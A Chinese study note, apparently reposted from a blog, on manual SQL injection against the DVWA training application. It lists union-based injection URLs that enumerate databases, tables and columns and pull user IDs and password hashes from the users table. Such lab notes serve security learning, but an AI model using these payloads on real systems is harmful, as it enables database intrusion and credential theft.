zoukankan      html  css  js  c++  java
  • 手动漏洞挖掘-SQL注入(安全牛笔记)

    substring_index(USER(),"@",l)--    #是将查询出来的结果进行切分,以@符号的方式切分
    ’ union select table_name,table_schema from information_schema.tables-- +   #查询数据库中所有的库表
    

      

    查询所有数据库,数据表:
    http://192.168.100.129/dvwa/vulnerabilities/sqli/
    ?id='+union+select+table_name,table_schema+from+information_schema.tables--+'
    &Submit=Submit#
    

    统计每个数据库中表的数量:
    http://192.168.100.129/dvwa/vulnerabilities/sqli/
    ?id='+union+select+table_schema,count(*)+from+information_schema.tables group by table_schema--+'
    &Submit=Submit#
    

    查询每个库中对应的表:
    http://192.168.100.129/dvwa/vulnerabilities/sqli/
    ?id='+union+select+table_name,table_schema from+information_schema.tables where table_schema='dvwa'--+'
    &Submit=Submit#
    

    查询user表中所有的列:
    http://192.168.100.129/dvwa/vulnerabilities/sqli/
    ?id='+union+select+table_name,column_name from+information_schema.columns where table_schema='dvwa' and table_name='users'--+'
    &Submit=Submit#
    

    查询user表中的用户和密码:
    http://192.168.100.129/dvwa/vulnerabilities/sqli/
    ?id='+union+select+user_id,password from dvwa.users --+'
    &Submit=Submit#
    

  • 相关阅读:
    B
    C. Baby Ehab Partitions Again
    NLP中数据稀疏问题的解决——数据平滑
    CodeForces-EDU-105 Div2 部分题解报告
    C
    前端面试知识点汇总
    elementUI table 合计行 单元格合并
    微信小程序 tab切换组件封装
    微信小程序-wx.request的封装实现
    微信小程序-input密码可见与不可见
  • 原文地址:https://www.cnblogs.com/pythonal/p/8675500.html
Copyright © 2011-2022 走看看